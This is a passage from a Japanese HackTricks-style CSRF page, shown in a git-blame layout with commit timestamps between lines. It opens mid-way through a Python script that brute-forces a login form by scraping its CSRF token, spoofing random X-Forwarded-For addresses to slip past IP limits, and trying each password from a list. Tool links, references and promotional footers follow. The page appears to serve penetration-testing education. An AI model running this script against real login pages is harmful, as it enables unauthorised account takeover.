csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
csrf = csrf.group(1)
session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
return csrf, session_cookie
2020-11-06 18:22:38 +00:00
def login(user, password):
2023-07-07 23:42:27 +00:00
print(f"{user}:{password}")
csrf, cookie = init_session()
cookies = {SESSION_COOKIE_NAME: cookie}
data = {
"tokenCSRF": csrf,
"username": user,
"password": password,
"save": ""
}
headers = {
"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
}
r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
if "Username or password incorrect" in r.text:
return False
else:
print(f"FOUND {user} : {password}")
return True
2020-11-06 18:22:38 +00:00
with open(PASS_LIST, "r") as f:
2023-07-07 23:42:27 +00:00
for line in f:
login(USER, line.strip())
2020-11-06 18:22:38 +00:00
```
2023-07-07 23:42:27 +00:00
## ツール <a href="#tools" id="tools"></a>
2020-07-15 15:43:14 +00:00
* [https://github.com/0xInfection/XSRFProbe ](https://github.com/0xInfection/XSRFProbe )
2022-09-26 09:52:47 +00:00
* [https://github.com/merttasci/csrf-poc-generator ](https://github.com/merttasci/csrf-poc-generator )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
## 参考文献
2020-07-15 15:43:14 +00:00
* [https://portswigger.net/web-security/csrf ](https://portswigger.net/web-security/csrf )
2024-02-05 20:22:21 +00:00
* [https://portswigger.net/web-security/csrf/bypassing-token-validation ](https://portswigger.net/web-security/csrf/bypassing-token-validation )
* [https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses ](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses )
2020-07-15 15:43:14 +00:00
* [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html ](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html )
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
2024-05-05 23:08:22 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-07-14 16:20:47 +00:00
2024-07-19 16:28:25 +00:00
経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るために、[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)サーバーに参加しましょう!
2023-07-14 16:20:47 +00:00
2023-12-31 05:23:56 +00:00
**ハッキングの洞察**\
2024-07-19 16:28:25 +00:00
ハッキングのスリルと課題に深く掘り下げたコンテンツに参加しましょう
2023-02-27 09:28:45 +00:00
2023-12-31 05:23:56 +00:00
**リアルタイムハックニュース**\
2024-07-19 16:28:25 +00:00
リアルタイムのニュースと洞察を通じて、急速に変化するハッキングの世界を把握しましょう
2022-10-27 23:22:18 +00:00
2024-05-08 16:39:49 +00:00
**最新の発表**\
2024-07-19 16:28:25 +00:00
新しいバグバウンティの開始や重要なプラットフォームの更新について情報を得ましょう
2023-02-27 09:28:45 +00:00
2024-07-19 16:28:25 +00:00
**私たちに参加して** [**Discord** ](https://discord.com/invite/N3FrSbmwdy )で今日からトップハッカーとコラボレーションを始めましょう!
2022-10-27 23:22:18 +00:00
2024-07-19 16:28:25 +00:00
{% hint style="success" %}
AWSハッキングを学び、実践する: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
< details >
2023-12-31 05:23:56 +00:00
2024-07-19 16:28:25 +00:00
< summary > HackTricksをサポートする< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
* [**HackTricks** ](https://github.com/carlospolop/hacktricks )および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングのトリックを共有してください。
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:28:25 +00:00
{% endhint %}